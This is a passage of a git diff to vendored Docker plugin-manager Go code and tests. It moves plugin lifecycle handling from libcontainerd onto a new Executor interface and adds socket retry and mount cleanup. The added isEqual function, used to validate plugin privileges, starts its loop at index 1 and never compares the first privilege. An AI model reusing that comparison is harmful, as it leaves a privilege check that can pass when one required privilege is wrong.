+	running, _ := exec.IsRunning(id)
+	assert.Assert(t, running)
+
+	// create with the same ID
+	err = exec.Create(id, specs.Spec{}, nil, nil)
+	assert.Assert(t, err != nil)
+
+	mock.HandleExitEvent(id) // simulate a plugin that exits
+
+	err = exec.Create(id, specs.Spec{}, nil, nil)
+	assert.Assert(t, err)
+}
+
+func setupTest(t *testing.T, client Client, eh ExitHandler) (*Executor, func()) {
+	rootDir, err := ioutil.TempDir("", "test-daemon")
+	assert.Assert(t, err)
+	assert.Assert(t, client != nil)
+	assert.Assert(t, eh != nil)
+
+	return &Executor{
+			rootDir:     rootDir,
+			client:      client,
+			exitHandler: eh,
+		}, func() {
+			assert.Assert(t, os.RemoveAll(rootDir))
+		}
+}
+
+type mockClient struct {
+	mu           sync.Mutex
+	containers   map[string]bool
+	errorOnStart map[string]bool
+}
+
+func newMockClient() *mockClient {
+	return &mockClient{
+		containers:   make(map[string]bool),
+		errorOnStart: make(map[string]bool),
+	}
+}
+
+func (c *mockClient) Create(ctx context.Context, id string, _ *specs.Spec, _ interface{}) error {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+
+	if _, ok := c.containers[id]; ok {
+		return errors.New("exists")
+	}
+
+	c.containers[id] = false
+	return nil
+}
+
+func (c *mockClient) Restore(ctx context.Context, id string, attachStdio libcontainerd.StdioCallback) (alive bool, pid int, err error) {
+	return false, 0, nil
+}
+
+func (c *mockClient) Status(ctx context.Context, id string) (libcontainerd.Status, error) {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+
+	running, ok := c.containers[id]
+	if !ok {
+		return libcontainerd.StatusUnknown, errors.New("not found")
+	}
+	if running {
+		return libcontainerd.StatusRunning, nil
+	}
+	return libcontainerd.StatusStopped, nil
+}
+
+func (c *mockClient) Delete(ctx context.Context, id string) error {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+	delete(c.containers, id)
+	return nil
+}
+
+func (c *mockClient) DeleteTask(ctx context.Context, id string) (uint32, time.Time, error) {
+	return 0, time.Time{}, nil
+}
+
+func (c *mockClient) Start(ctx context.Context, id, checkpointDir string, withStdin bool, attachStdio libcontainerd.StdioCallback) (pid int, err error) {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+
+	if _, ok := c.containers[id]; !ok {
+		return 0, errors.New("not found")
+	}
+
+	if c.errorOnStart[id] {
+		return 0, errors.New("some startup error")
+	}
+	c.containers[id] = true
+	return 1, nil
+}
+
+func (c *mockClient) SignalProcess(ctx context.Context, containerID, processID string, signal int) error {
+	return nil
+}
+
+func (c *mockClient) simulateStartError(sim bool, id string) {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+	if sim {
+		c.errorOnStart[id] = sim
+		return
+	}
+	delete(c.errorOnStart, id)
+}
+
+func (c *mockClient) HandleExitEvent(id string) error {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+	delete(c.containers, id)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/plugin/manager.go b/vendor/github.com/docker/docker/plugin/manager.go
index f260aa61a7..c6f896129b 100644
--- a/vendor/github.com/docker/docker/plugin/manager.go
+++ b/vendor/github.com/docker/docker/plugin/manager.go
@@ -1,4 +1,4 @@
-package plugin
+package plugin // import "github.com/docker/docker/plugin"
 
 import (
 	"encoding/json"
@@ -8,21 +8,25 @@ import (
 	"path/filepath"
 	"reflect"
 	"regexp"
+	"sort"
 	"strings"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
-	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/authorization"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/pubsub"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/docker/plugin/v2"
-	"github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
+	"github.com/opencontainers/go-digest"
+	"github.com/opencontainers/runtime-spec/specs-go"
 	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 const configFileName = "config.json"
@@ -30,9 +34,17 @@ const rootFSFileName = "rootfs"
 
 var validFullID = regexp.MustCompile(`^([a-f0-9]{64})$`)
 
-func (pm *Manager) restorePlugin(p *v2.Plugin) error {
+// Executor is the interface that the plugin manager uses to interact with for starting/stopping plugins
+type Executor interface {
+	Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error
+	IsRunning(id string) (bool, error)
+	Restore(id string, stdout, stderr io.WriteCloser) (alive bool, err error)
+	Signal(id string, signal int) error
+}
+
+func (pm *Manager) restorePlugin(p *v2.Plugin, c *controller) error {
 	if p.IsEnabled() {
-		return pm.restore(p)
+		return pm.restore(p, c)
 	}
 	return nil
 }
@@ -42,22 +54,27 @@ type eventLogger func(id, name, action string)
 // ManagerConfig defines configuration needed to start new manager.
 type ManagerConfig struct {
 	Store              *Store // remove
-	Executor           libcontainerd.Remote
 	RegistryService    registry.Service
 	LiveRestoreEnabled bool // TODO: remove
 	LogPluginEvent     eventLogger
 	Root               string
 	ExecRoot           string
+	CreateExecutor     ExecutorCreator
+	AuthzMiddleware    *authorization.Middleware
 }
 
+// ExecutorCreator is used in the manager config to pass in an `Executor`
+type ExecutorCreator func(*Manager) (Executor, error)
+
 // Manager controls the plugin subsystem.
 type Manager struct {
-	config           ManagerConfig
-	mu               sync.RWMutex // protects cMap
-	muGC             sync.RWMutex // protects blobstore deletions
-	cMap             map[*v2.Plugin]*controller
-	containerdClient libcontainerd.Client
-	blobStore        *basicBlobStore
+	config    ManagerConfig
+	mu        sync.RWMutex // protects cMap
+	muGC      sync.RWMutex // protects blobstore deletions
+	cMap      map[*v2.Plugin]*controller
+	blobStore *basicBlobStore
+	publisher *pubsub.Publisher
+	executor  Executor
 }
 
 // controller represents the manager's control on a plugin.
@@ -89,20 +106,17 @@ func NewManager(config ManagerConfig) (*Manager, error) {
 	manager := &Manager{
 		config: config,
 	}
-	if err := os.MkdirAll(manager.config.Root, 0700); err != nil {
-		return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.Root)
-	}
-	if err := os.MkdirAll(manager.config.ExecRoot, 0700); err != nil {
-		return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.ExecRoot)
-	}
-	if err := os.MkdirAll(manager.tmpDir(), 0700); err != nil {
-		return nil, errors.Wrapf(err, "failed to mkdir %v", manager.tmpDir())
+	for _, dirName := range []string{manager.config.Root, manager.config.ExecRoot, manager.tmpDir()} {
+		if err := os.MkdirAll(dirName, 0700); err != nil {
+			return nil, errors.Wrapf(err, "failed to mkdir %v", dirName)
+		}
 	}
 	var err error
-	manager.containerdClient, err = config.Executor.Client(manager) // todo: move to another struct
+	manager.executor, err = config.CreateExecutor(manager)
 	if err != nil {
-		return nil, errors.Wrap(err, "failed to create containerd client")
+		return nil, err
 	}
+
 	manager.blobStore, err = newBasicBlobStore(filepath.Join(manager.config.Root, "storage/blobs"))
 	if err != nil {
 		return nil, err
@@ -112,6 +126,8 @@ func NewManager(config ManagerConfig) (*Manager, error) {
 	if err := manager.reload(); err != nil {
 		return nil, errors.Wrap(err, "failed to restore plugins")
 	}
+
+	manager.publisher = pubsub.NewPublisher(0, 0)
 	return manager, nil
 }
 
@@ -119,46 +135,50 @@ func (pm *Manager) tmpDir() string {
 	return filepath.Join(pm.config.Root, "tmp")
 }
 
-// StateChanged updates plugin internals using libcontainerd events.
-func (pm *Manager) StateChanged(id string, e libcontainerd.StateInfo) error {
-	logrus.Debugf("plugin state changed %s %#v", id, e)
-
-	switch e.State {
-	case libcontainerd.StateExit:
-		p, err := pm.config.Store.GetV2Plugin(id)
-		if err != nil {
-			return err
-		}
-
-		pm.mu.RLock()
-		c := pm.cMap[p]
-
-		if c.exitChan != nil {
-			close(c.exitChan)
-		}
-		restart := c.restart
-		pm.mu.RUnlock()
-
-		os.RemoveAll(filepath.Join(pm.config.ExecRoot, id))
+// HandleExitEvent is called when the executor receives the exit event
+// In the future we may change this, but for now all we care about is the exit event.
+func (pm *Manager) HandleExitEvent(id string) error {
+	p, err := pm.config.Store.GetV2Plugin(id)
+	if err != nil {
+		return err
+	}
 
-		if p.PropagatedMount != "" {
-			if err := mount.Unmount(p.PropagatedMount); err != nil {
-				logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err)
-			}
-			propRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount")
-			if err := mount.Unmount(propRoot); err != nil {
-				logrus.Warn("Could not unmount %s: %v", propRoot, err)
-			}
-		}
+	if err := os.RemoveAll(filepath.Join(pm.config.ExecRoot, id)); err != nil && !os.IsNotExist(err) {
+		logrus.WithError(err).WithField("id", id).Error("Could not remove plugin bundle dir")
+	}
 
-		if restart {
-			pm.enable(p, c, true)
+	pm.mu.RLock()
+	c := pm.cMap[p]
+	if c.exitChan != nil {
+		close(c.exitChan)
+		c.exitChan = nil // ignore duplicate events (containerd issue #2299)
+	}
+	restart := c.restart
+	pm.mu.RUnlock()
+
+	if restart {
+		pm.enable(p, c, true)
+	} else {
+		if err := mount.RecursiveUnmount(filepath.Join(pm.config.Root, id)); err != nil {
+			return errors.Wrap(err, "error cleaning up plugin mounts")
 		}
 	}
-
 	return nil
 }
 
+func handleLoadError(err error, id string) {
+	if err == nil {
+		return
+	}
+	logger := logrus.WithError(err).WithField("id", id)
+	if os.IsNotExist(errors.Cause(err)) {
+		// Likely some error while removing on an older version of docker
+		logger.Warn("missing plugin config, skipping: this may be caused due to a failed remove and requires manual cleanup.")
+		return
+	}
+	logger.Error("error loading plugin, skipping")
+}
+
 func (pm *Manager) reload() error { // todo: restore
 	dir, err := ioutil.ReadDir(pm.config.Root)
 	if err != nil {
@@ -169,9 +189,17 @@ func (pm *Manager) reload() error { // todo: restore
 		if validFullID.MatchString(v.Name()) {
 			p, err := pm.loadPlugin(v.Name())
 			if err != nil {
-				return err
+				handleLoadError(err, v.Name())
+				continue
 			}
 			plugins[p.GetID()] = p
+		} else {
+			if validFullID.MatchString(strings.TrimSuffix(v.Name(), "-removing")) {
+				// There was likely some error while removing this plugin, let's try to remove again here
+				if err := system.EnsureRemoveAll(v.Name()); err != nil {
+					logrus.WithError(err).WithField("id", v.Name()).Warn("error while attempting to clean up previously removed plugin")
+				}
+			}
 		}
 	}
 
@@ -180,12 +208,15 @@ func (pm *Manager) reload() error { // todo: restore
 	var wg sync.WaitGroup
 	wg.Add(len(plugins))
 	for _, p := range plugins {
-		c := &controller{} // todo: remove this
+		c := &controller{exitChan: make(chan bool)}
+		pm.mu.Lock()
 		pm.cMap[p] = c
+		pm.mu.Unlock()
+
 		go func(p *v2.Plugin) {
 			defer wg.Done()
-			if err := pm.restorePlugin(p); err != nil {
-				logrus.Errorf("failed to restore plugin '%s': %s", p.Name(), err)
+			if err := pm.restorePlugin(p, c); err != nil {
+				logrus.WithError(err).WithField("id", p.GetID()).Error("Failed to restore plugin")
 				return
 			}
 
@@ -202,28 +233,17 @@ func (pm *Manager) reload() error { // todo: restore
 						// check if we need to migrate an older propagated mount from before
 						// these mounts were stored outside the plugin rootfs
 						if _, err := os.Stat(propRoot); os.IsNotExist(err) {
-							if _, err := os.Stat(p.PropagatedMount); err == nil {
-								// make sure nothing is mounted here
-								// don't care about errors
-								mount.Unmount(p.PropagatedMount)
-								if err := os.Rename(p.PropagatedMount, propRoot); err != nil {
+							rootfsProp := filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount)
+							if _, err := os.Stat(rootfsProp); err == nil {
+								if err := os.Rename(rootfsProp, propRoot); err != nil {
 									logrus.WithError(err).WithField("dir", propRoot).Error("error migrating propagated mount storage")
 								}
-								if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil {
-									logrus.WithError(err).WithField("dir", p.PropagatedMount).Error("error migrating propagated mount storage")
-								}
 							}
 						}
 
 						if err := os.MkdirAll(propRoot, 0755); err != nil {
 							logrus.Errorf("failed to create PropagatedMount directory at %s: %v", propRoot, err)
 						}
-						// TODO: sanitize PropagatedMount and prevent breakout
-						p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount)
-						if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil {
-							logrus.Errorf("failed to create PropagatedMount directory at %s: %v", p.PropagatedMount, err)
-							return
-						}
 					}
 				}
 			}
@@ -234,7 +254,7 @@ func (pm *Manager) reload() error { // todo: restore
 			if requiresManualRestore {
 				// if liveRestore is not enabled, the plugin will be stopped now so we should enable it
 				if err := pm.enable(p, c, true); err != nil {
-					logrus.Errorf("failed to enable plugin '%s': %s", p.Name(), err)
+					logrus.WithError(err).WithField("id", p.GetID()).Error("failed to enable plugin")
 				}
 			}
 		}(p)
@@ -243,6 +263,11 @@ func (pm *Manager) reload() error { // todo: restore
 	return nil
 }
 
+// Get looks up the requested plugin in the store.
+func (pm *Manager) Get(idOrName string) (*v2.Plugin, error) {
+	return pm.config.Store.GetV2Plugin(idOrName)
+}
+
 func (pm *Manager) loadPlugin(id string) (*v2.Plugin, error) {
 	p := filepath.Join(pm.config.Root, id, configFileName)
 	dt, err := ioutil.ReadFile(p)
@@ -267,7 +292,7 @@ func (pm *Manager) save(p *v2.Plugin) error {
 	return nil
 }
 
-// GC cleans up unrefrenced blobs. This is recommended to run in a goroutine
+// GC cleans up unreferenced blobs. This is recommended to run in a goroutine
 func (pm *Manager) GC() {
 	pm.muGC.Lock()
 	defer pm.muGC.Unlock()
@@ -294,33 +319,45 @@ func (l logHook) Fire(entry *logrus.Entry) error {
 	return nil
 }
 
-func attachToLog(id string) func(libcontainerd.IOPipe) error {
-	return func(iop libcontainerd.IOPipe) error {
-		iop.Stdin.Close()
-
-		logger := logrus.New()
-		logger.Hooks.Add(logHook{id})
-		// TODO: cache writer per id
-		w := logger.Writer()
-		go func() {
-			io.Copy(w, iop.Stdout)
-		}()
-		go func() {
-			// TODO: update logrus and use logger.WriterLevel
-			io.Copy(w, iop.Stderr)
-		}()
-		return nil
-	}
+func makeLoggerStreams(id string) (stdout, stderr io.WriteCloser) {
+	logger := logrus.New()
+	logger.Hooks.Add(logHook{id})
+	return logger.WriterLevel(logrus.InfoLevel), logger.WriterLevel(logrus.ErrorLevel)
 }
 
 func validatePrivileges(requiredPrivileges, privileges types.PluginPrivileges) error {
-	// todo: make a better function that doesn't check order
-	if !reflect.DeepEqual(privileges, requiredPrivileges) {
+	if !isEqual(requiredPrivileges, privileges, isEqualPrivilege) {
 		return errors.New("incorrect privileges")
 	}
+
 	return nil
 }
 
+func isEqual(arrOne, arrOther types.PluginPrivileges, compare func(x, y types.PluginPrivilege) bool) bool {
+	if len(arrOne) != len(arrOther) {
+		return false
+	}
+
+	sort.Sort(arrOne)
+	sort.Sort(arrOther)
+
+	for i := 1; i < arrOne.Len(); i++ {
+		if !compare(arrOne[i], arrOther[i]) {
+			return false
+		}
+	}
+
+	return true
+}
+
+func isEqualPrivilege(a, b types.PluginPrivilege) bool {
+	if a.Name != b.Name {
+		return false
+	}
+
+	return reflect.DeepEqual(a.Value, b.Value)
+}
+
 func configToRootFS(c []byte) (*image.RootFS, error) {
 	var pluginConfig types.PluginConfig
 	if err := json.Unmarshal(c, &pluginConfig); err != nil {
diff --git a/vendor/github.com/docker/docker/plugin/manager_linux.go b/vendor/github.com/docker/docker/plugin/manager_linux.go
index ad66616628..3c6f9c553a 100644
--- a/vendor/github.com/docker/docker/plugin/manager_linux.go
+++ b/vendor/github.com/docker/docker/plugin/manager_linux.go
@@ -1,32 +1,31 @@
-// +build linux
-
-package plugin
+package plugin // import "github.com/docker/docker/plugin"
 
 import (
 	"encoding/json"
-	"fmt"
+	"net"
 	"os"
 	"path/filepath"
-	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/daemon/initlayer"
-	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/plugins"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/plugin/v2"
-	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/opencontainers/go-digest"
 	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error {
 	p.Rootfs = filepath.Join(pm.config.Root, p.PluginObj.ID, "rootfs")
 	if p.IsEnabled() && !force {
-		return fmt.Errorf("plugin %s is already enabled", p.Name())
+		return errors.Wrap(enabledError(p.Name()), "plugin already enabled")
 	}
 	spec, err := p.InitSpec(pm.config.ExecRoot)
 	if err != nil {
@@ -41,7 +40,7 @@ func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error {
 	pm.mu.Unlock()
 
 	var propRoot string
-	if p.PropagatedMount != "" {
+	if p.PluginObj.Config.PropagatedMount != "" {
 		propRoot = filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount")
 
 		if err := os.MkdirAll(propRoot, 0755); err != nil {
@@ -51,55 +50,82 @@ func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error {
 		if err := mount.MakeRShared(propRoot); err != nil {
 			return errors.Wrap(err, "error setting up propagated mount dir")
 		}
-
-		if err := mount.Mount(propRoot, p.PropagatedMount, "none", "rbind"); err != nil {
-			return errors.Wrap(err, "error creating mount for propagated mount")
-		}
 	}
 
-	if err := initlayer.Setup(filepath.Join(pm.config.Root, p.PluginObj.ID, rootFSFileName), 0, 0); err != nil {
+	rootFS := containerfs.NewLocalContainerFS(filepath.Join(pm.config.Root, p.PluginObj.ID, rootFSFileName))
+	if err := initlayer.Setup(rootFS, idtools.IDPair{UID: 0, GID: 0}); err != nil {
 		return errors.WithStack(err)
 	}
 
-	if err := pm.containerdClient.Create(p.GetID(), "", "", specs.Spec(*spec), attachToLog(p.GetID())); err != nil {
-		if p.PropagatedMount != "" {
-			if err := mount.Unmount(p.PropagatedMount); err != nil {
-				logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err)
-			}
+	stdout, stderr := makeLoggerStreams(p.GetID())
+	if err := pm.executor.Create(p.GetID(), *spec, stdout, stderr); err != nil {
+		if p.PluginObj.Config.PropagatedMount != "" {
 			if err := mount.Unmount(propRoot); err != nil {
 				logrus.Warnf("Could not unmount %s: %v", propRoot, err)
 			}
 		}
 		return errors.WithStack(err)
 	}
-
 	return pm.pluginPostStart(p, c)
 }
 
 func (pm *Manager) pluginPostStart(p *v2.Plugin, c *controller) error {
-	client, err := plugins.NewClientWithTimeout("unix://"+filepath.Join(pm.config.ExecRoot, p.GetID(), p.GetSocket()), nil, c.timeoutInSecs)
-	if err != nil {
-		c.restart = false
-		shutdownPlugin(p, c, pm.containerdClient)
-		return errors.WithStack(err)
+	sockAddr := filepath.Join(pm.config.ExecRoot, p.GetID(), p.GetSocket())
+	p.SetTimeout(time.Duration(c.timeoutInSecs) * time.Second)
+	addr := &net.UnixAddr{Net: "unix", Name: sockAddr}
+	p.SetAddr(addr)
+
+	if p.Protocol() == plugins.ProtocolSchemeHTTPV1 {
+		client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, p.Timeout())
+		if err != nil {
+			c.restart = false
+			shutdownPlugin(p, c.exitChan, pm.executor)
+			return errors.WithStack(err)
+		}
+
+		p.SetPClient(client)
 	}
 
-	p.SetPClient(client)
+	// Initial sleep before net Dial to allow plugin to listen on socket.
+	time.Sleep(500 * time.Millisecond)
+	maxRetries := 3
+	var retries int
+	for {
+		// net dial into the unix socket to see if someone's listening.
+		conn, err := net.Dial("unix", sockAddr)
+		if err == nil {
+			conn.Close()
+			break
+		}
+
+		time.Sleep(3 * time.Second)
+		retries++
+
+		if retries > maxRetries {
+			logrus.Debugf("error net dialing plugin: %v", err)
+			c.restart = false
+			// While restoring plugins, we need to explicitly set the state to disabled
+			pm.config.Store.SetState(p, false)
+			shutdownPlugin(p, c.exitChan, pm.executor)
+			return err
+		}
+
+	}
 	pm.config.Store.SetState(p, true)
 	pm.config.Store.CallHandler(p)
 
 	return pm.save(p)
 }
 
-func (pm *Manager) restore(p *v2.Plugin) error {
-	if err := pm.containerdClient.Restore(p.GetID(), attachToLog(p.GetID())); err != nil {
+func (pm *Manager) restore(p *v2.Plugin, c *controller) error {
+	stdout, stderr := makeLoggerStreams(p.GetID())
+	alive, err := pm.executor.Restore(p.GetID(), stdout, stderr)
+	if err != nil {
 		return err
 	}
 
 	if pm.config.LiveRestoreEnabled {
-		c := &controller{}
-		if pids, _ := pm.containerdClient.GetPidsForContainer(p.GetID()); len(pids) == 0 {
-			// plugin is not running, so follow normal startup procedure
+		if !alive {
 			return pm.enable(p, c, true)
 		}
 
@@ -111,35 +137,47 @@ func (pm *Manager) restore(p *v2.Plugin) error {
 		return pm.pluginPostStart(p, c)
 	}
 
+	if alive {
+		// TODO(@cpuguy83): Should we always just re-attach to the running plugin instead of doing this?
+		c.restart = false
+		shutdownPlugin(p, c.exitChan, pm.executor)
+	}
+
 	return nil
 }
 
-func shutdownPlugin(p *v2.Plugin, c *controller, containerdClient libcontainerd.Client) {
+func shutdownPlugin(p *v2.Plugin, ec chan bool, executor Executor) {
 	pluginID := p.GetID()
 
-	err := containerdClient.Signal(pluginID, int(syscall.SIGTERM))
+	err := executor.Signal(pluginID, int(unix.SIGTERM))
 	if err != nil {
 		logrus.Errorf("Sending SIGTERM to plugin failed with error: %v", err)
 	} else {
 		select {
-		case <-c.exitChan:
+		case <-ec:
 			logrus.Debug("Clean shutdown of plugin")
 		case <-time.After(time.Second * 10):
 			logrus.Debug("Force shutdown plugin")
-			if err := containerdClient.Signal(pluginID, int(syscall.SIGKILL)); err != nil {
+			if err := executor.Signal(pluginID, int(unix.SIGKILL)); err != nil {
 				logrus.Errorf("Sending SIGKILL to plugin failed with error: %v", err)
 			}
+			select {
+			case <-ec:
+				logrus.Debug("SIGKILL plugin shutdown")
+			case <-time.After(time.Second * 10):
+				logrus.Debug("Force shutdown plugin FAILED")
+			}
 		}
 	}
 }
 
 func (pm *Manager) disable(p *v2.Plugin, c *controller) error {
 	if !p.IsEnabled() {
-		return fmt.Errorf("plugin %s is already disabled", p.Name())
+		return errors.Wrap(errDisabled(p.Name()), "plugin is already disabled")
 	}
 
 	c.restart = false
-	shutdownPlugin(p, c, pm.containerdClient)
+	shutdownPlugin(p, c.exitChan, pm.executor)
 	pm.config.Store.SetState(p, false)
 	return pm.save(p)
 }
@@ -156,11 +194,14 @@ func (pm *Manager) Shutdown() {
 			logrus.Debug("Plugin active when liveRestore is set, skipping shutdown")
 			continue
 		}
-		if pm.containerdClient != nil && p.IsEnabled() {
+		if pm.executor != nil && p.IsEnabled() {
 			c.restart = false
-			shutdownPlugin(p, c, pm.containerdClient)
+			shutdownPlugin(p, c.exitChan, pm.executor)
 		}
 	}
+	if err := mount.RecursiveUnmount(pm.config.Root); err != nil {
+		logrus.WithError(err).Warn("error cleaning up plugin mounts")
+	}
 }
 
 func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobsums []digest.Digest, tmpRootFSDir string, privileges *types.PluginPrivileges) (err error) {
@@ -171,9 +212,17 @@ func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobs
 
 	pdir := filepath.Join(pm.config.Root, p.PluginObj.ID)
 	orig := filepath.Join(pdir, "rootfs")
+
+	// Make sure nothing is mounted
+	// This could happen if the plugin was disabled with `-f` with active mounts.
+	// If there is anything in `orig` is still mounted, this should error out.
+	if err := mount.RecursiveUnmount(orig); err != nil {
+		return errdefs.System(err)
+	}
+
 	backup := orig + "-old"
 	if err := os.Rename(orig, backup); err != nil {
-		return err
+		return errors.Wrap(errdefs.System(err), "error backing up plugin data before upgrade")
 	}
 
 	defer func() {
@@ -182,9 +231,8 @@ func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobs
 				logrus.WithError(rmErr).WithField("dir", backup).Error("error cleaning up after failed upgrade")
 				return
 			}
-
-			if err := os.Rename(backup, orig); err != nil {
-				err = errors.Wrap(err, "error restoring old plugin root on upgrade failure")
+			if mvErr := os.Rename(backup, orig); mvErr != nil {
+				err = errors.Wrap(mvErr, "error restoring old plugin root on upgrade failure")
 			}
 			if rmErr := os.RemoveAll(tmpRootFSDir); rmErr != nil && !os.IsNotExist(rmErr) {
 				logrus.WithError(rmErr).WithField("plugin", p.Name()).Errorf("error cleaning up plugin upgrade dir: %s", tmpRootFSDir)
@@ -200,7 +248,7 @@ func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobs
 	}()
 
 	if err := os.Rename(tmpRootFSDir, orig); err != nil {
-		return errors.Wrap(err, "error upgrading")
+		return errors.Wrap(errdefs.System(err), "error upgrading")
 	}
 
 	p.PluginObj.Config = config
@@ -224,7 +272,7 @@ func (pm *Manager) setupNewPlugin(configDigest digest.Digest, blobsums []digest.
 		return types.PluginConfig{}, errors.New("invalid config json")
 	}
 
-	requiredPrivileges, err := computePrivileges(config)
+	requiredPrivileges := computePrivileges(config)
 	if err != nil {
 		return types.PluginConfig{}, err
 	}
@@ -238,9 +286,9 @@ func (pm *Manager) setupNewPlugin(configDigest digest.Digest, blobsums []digest.
 }
 
 // createPlugin creates a new plugin. take lock before calling.
-func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsums []digest.Digest, rootFSDir string, privileges *types.PluginPrivileges) (p *v2.Plugin, err error) {
+func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsums []digest.Digest, rootFSDir string, privileges *types.PluginPrivileges, opts ...CreateOpt) (p *v2.Plugin, err error) {
 	if err := pm.config.Store.validateName(name); err != nil { // todo: this check is wrong. remove store
-		return nil, err
+		return nil, errdefs.InvalidParameter(err)
 	}
 
 	config, err := pm.setupNewPlugin(configDigest, blobsums, privileges)
@@ -258,6 +306,9 @@ func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsum
 		Blobsums: blobsums,
 	}
 	p.InitEmptySettings()
+	for _, o := range opts {
+		o(p)
+	}
 
 	pdir := filepath.Join(pm.config.Root, p.PluginObj.ID)
 	if err := os.MkdirAll(pdir, 0700); err != nil {
diff --git a/vendor/github.com/docker/docker/plugin/manager_linux_test.go b/vendor/github.com/docker/docker/plugin/manager_linux_test.go
new file mode 100644
index 0000000000..fd8fa8523c
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/manager_linux_test.go
@@ -0,0 +1,279 @@
+package plugin // import "github.com/docker/docker/plugin"
+
+import (
+	"io"
+	"io/ioutil"
+	"net"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/plugin/v2"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"gotest.tools/skip"
+)
+
+func TestManagerWithPluginMounts(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
+	root, err := ioutil.TempDir("", "test-store-with-plugin-mounts")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer system.EnsureRemoveAll(root)
+
+	s := NewStore()
+	managerRoot := filepath.Join(root, "manager")
+	p1 := newTestPlugin(t, "test1", "testcap", managerRoot)
+
+	p2 := newTestPlugin(t, "test2", "testcap", managerRoot)
+	p2.PluginObj.Enabled = true
+
+	m, err := NewManager(
+		ManagerConfig{
+			Store:          s,
+			Root:           managerRoot,
+			ExecRoot:       filepath.Join(root, "exec"),
+			CreateExecutor: func(*Manager) (Executor, error) { return nil, nil },
+			LogPluginEvent: func(_, _, _ string) {},
+		})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := s.Add(p1); err != nil {
+		t.Fatal(err)
+	}
+	if err := s.Add(p2); err != nil {
+		t.Fatal(err)
+	}
+
+	// Create a mount to simulate a plugin that has created it's own mounts
+	p2Mount := filepath.Join(p2.Rootfs, "testmount")
+	if err := os.MkdirAll(p2Mount, 0755); err != nil {
+		t.Fatal(err)
+	}
+	if err := mount.Mount("tmpfs", p2Mount, "tmpfs", ""); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := m.Remove(p1.GetID(), &types.PluginRmConfig{ForceRemove: true}); err != nil {
+		t.Fatal(err)
+	}
+	if mounted, err := mount.Mounted(p2Mount); !mounted || err != nil {
+		t.Fatalf("expected %s to be mounted, err: %v", p2Mount, err)
+	}
+}
+
+func newTestPlugin(t *testing.T, name, cap, root string) *v2.Plugin {
+	id := stringid.GenerateNonCryptoID()
+	rootfs := filepath.Join(root, id)
+	if err := os.MkdirAll(rootfs, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	p := v2.Plugin{PluginObj: types.Plugin{ID: id, Name: name}}
+	p.Rootfs = rootfs
+	iType := types.PluginInterfaceType{Capability: cap, Prefix: "docker", Version: "1.0"}
+	i := types.PluginConfigInterface{Socket: "plugin.sock", Types: []types.PluginInterfaceType{iType}}
+	p.PluginObj.Config.Interface = i
+	p.PluginObj.ID = id
+
+	return &p
+}
+
+type simpleExecutor struct {
+}
+
+func (e *simpleExecutor) Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error {
+	return errors.New("Create failed")
+}
+
+func (e *simpleExecutor) Restore(id string, stdout, stderr io.WriteCloser) (bool, error) {
+	return false, nil
+}
+
+func (e *simpleExecutor) IsRunning(id string) (bool, error) {
+	return false, nil
+}
+
